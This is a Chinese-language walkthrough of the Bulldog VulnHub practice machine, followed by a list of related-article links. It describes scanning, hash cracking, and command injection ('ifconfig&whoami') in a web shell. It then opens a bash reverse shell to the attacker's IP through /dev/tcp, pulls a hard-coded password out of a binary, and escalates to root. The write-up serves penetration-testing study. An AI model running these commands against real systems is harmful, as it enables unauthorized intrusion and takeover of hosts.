运行环境:

测试机:kali
靶机:bulludog

主机发现

arp-scan -l
或者
netdiscover -i eth0 -r 192.168.223.0/24
或者
nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要扫)
扫描出来是192.168.223.233


端口扫描

masscan --rate=10000 -p0-65535 192.168.223.233
masscan扫描速度快,但准确度不高,可以多扫几次,以防漏扫
或者
nmap -sS 192.168.223.132

服务识别

nmap -sV 192.168.223.233 -p23,8080,80

发现漏洞并识别

1.浏览器访问 http://192.168.223.233

没有发现什么可用的

目录扫描

发现2个大的目录,一个是admin,一个是dev

来尝试访问一下 192.168.223.233/admin/login,尝试弱密码登录,失败

查看一下网页源码,没有什么发现

我们再来看下另一个目录 192.168.223.233/dev
可以知道,完全删除了php和可以使用ssh,从之前端口扫描,我们可以知道ssh端口是23

点击web-shell,看能不能获取shh

点进去之后获取ssh失败,说必须以服务器身份登录才行

我们在回到之前的 192.168.223.233/dev 来查看一下源码,可以看到注释有MD5(Django)的字符串,

挨着顺序解密,发现只有最后2个可以解密出来,bulldog bulldoglover



尝试用解密出来的值做密码,解密前面的邮箱作为账号登录,

失败


尝试用邮箱开头做账号,解密值做密码,成功登录,但是发现没有任何权限


用另一个也是一样,成功登录,但是发现没有任何权限

这时候再打开172.168.111.90/dev页面,发现刚才的web shell能用了


不过好像只能用系统给出的几个命令。先试一下有没有命令注
ifconfig&whoami
根据反馈结果判断存在命令注入,那接下来就好办了。

在攻击机kali中打开命令终端开始监听,输入nc -lvnp 6666

尝试bash反弹,在靶机打开的网页命令框中输入
echo “bash -i >& /dev/tcp/192.168.223.34/6666 0>&1″ | bash

使用echo命令反弹shell成功

首先查看有哪些系统用户,cat /etc/passwd。发现了一个重点对象:bulldogadmin

然后,查找他的文件 find / -user bulldogadmin 2>/dev/null


发现有hiddenadmindirectory隐藏目录,用less命令打开里面包含的文件看看,比如打开note看看

我也不知道是啥意思,那就百度翻译一下

我们再来看另一个,


发现是乱码,我们用 strings 来看一下这个文件
strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
噗,看到一堆英文字符,但是依然可以很轻松的看出文件中间有一个被 H 大段的PASSWORD的单词。于是把前后段去掉H ,得到SUPERultimatePASSWORDyouCANTget 把她保存着,可能需要这个密码

su命令执行一下,提示需要一个终端,

网查了一下资料,可以用python调用本地的shell,命令:
python -c ‘import pty;pty.spawn("/bin/bash")’

然后执行命令 sudo su – ,输入刚才记下来的的密码试一下,结果成功获得root权限,拿到flag
输入ls命令,发现里面只有一个文本文档
输入 cat congrats.txt 打开看下


这里要解释一下,我这里的双写
比如这个 其实就是sudo su -

总结:

主机发现
端口扫描
服务发现
然后查看web服务
爆破出目录admin和dev页面
利用解密MD5得到的密码登录系统,然后绕过系统权限
命令执行
反弹shell
提权

bulldog渗透总结相关推荐

  1. 2.Bulldog渗透实战

    攻击机:Kali 攻击机ip:192.168.56.102 主机发现 端口扫描 版本侦测 访问80,8080端口是一样的网站 在http://192.168.56.101:8080界面没有发现有价值的 ...

  2. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  5. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  6. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  7. 靶机渗透测试实战(三)——Bulldog1渗透实战

    目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集--主机发现 (2)信息收集--端口扫描 (3)信息收集--操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:I ...

  8. 渗透测试实战3——bulldog2靶机入侵

    一.实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150.(192.168.247.151) 开始之前,需先登录bulldog2.账号:di ...

  9. VulnHub渗透测试实战靶场笔记(持续更新)

    靶机(一)----Breach1.0 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网 ...

最新文章

  1. 047_BOM_DOM
  2. 第 2 章:初出茅庐【初级篇 - 2.2 贪心算法】
  3. Python基础1 历史 变量
  4. 区块链 PoS 共识——Tendermint
  5. 电脑操作系统维护10条实用建议!
  6. java xml解析_Java解析XML(4种方法)
  7. php yaf.dll,windows下配置nginx+php+yaf的环境
  8. 龙芯笔记本可能以闹剧收场
  9. Vue 动画 过渡的类名
  10. “吃神么,买神么”的第一个Sprint计划(第三天)
  11. PHP exit()与die()的区别
  12. 软件开发管理与质量控制
  13. “应用程序无法正常启动 0xc0150002”如何解决?
  14. HTML5实例教程:拼图游戏-何韬-专题视频课程
  15. 关于王者荣耀技术背景的文章
  16. 我们都需要刷新——读现任微软CEO萨提亚的《刷新》有感
  17. 用python实现颜值打分,还能测测自己的颜值
  18. error C2041: illegal digit ‘9‘ for base ‘8‘ | error C2059: syntax error: ‘bad suffix on number‘
  19. 如何优雅的写一篇安利文-以Sugar ORM为例
  20. 重磅!地球科学类最新SCI期刊影响因子2020

热门文章

  1. FS4059B是5V输入升压充电8.4V1.5A的升压恒流充电IC高效串联充电
  2. 多个计算机组成一个,怎么将两台计算机组成一个集群?
  3. GNS3 v0.8.6简体中文官方版本下载
  4. CSS3字体样式及高级特效
  5. 在计算机英语中input的意思,input是什么意思
  6. 新手购买服务器搭建属于自己的网站(详细版)
  7. excel排名_表格技巧—如何在Excel中快速计算排名
  8. Windows 平台下局域网劫持测试工具 – EvilFoca
  9. life: zz 关于爱情
  10. 掌握“盘带技术”——比较磁盘存储和磁带存储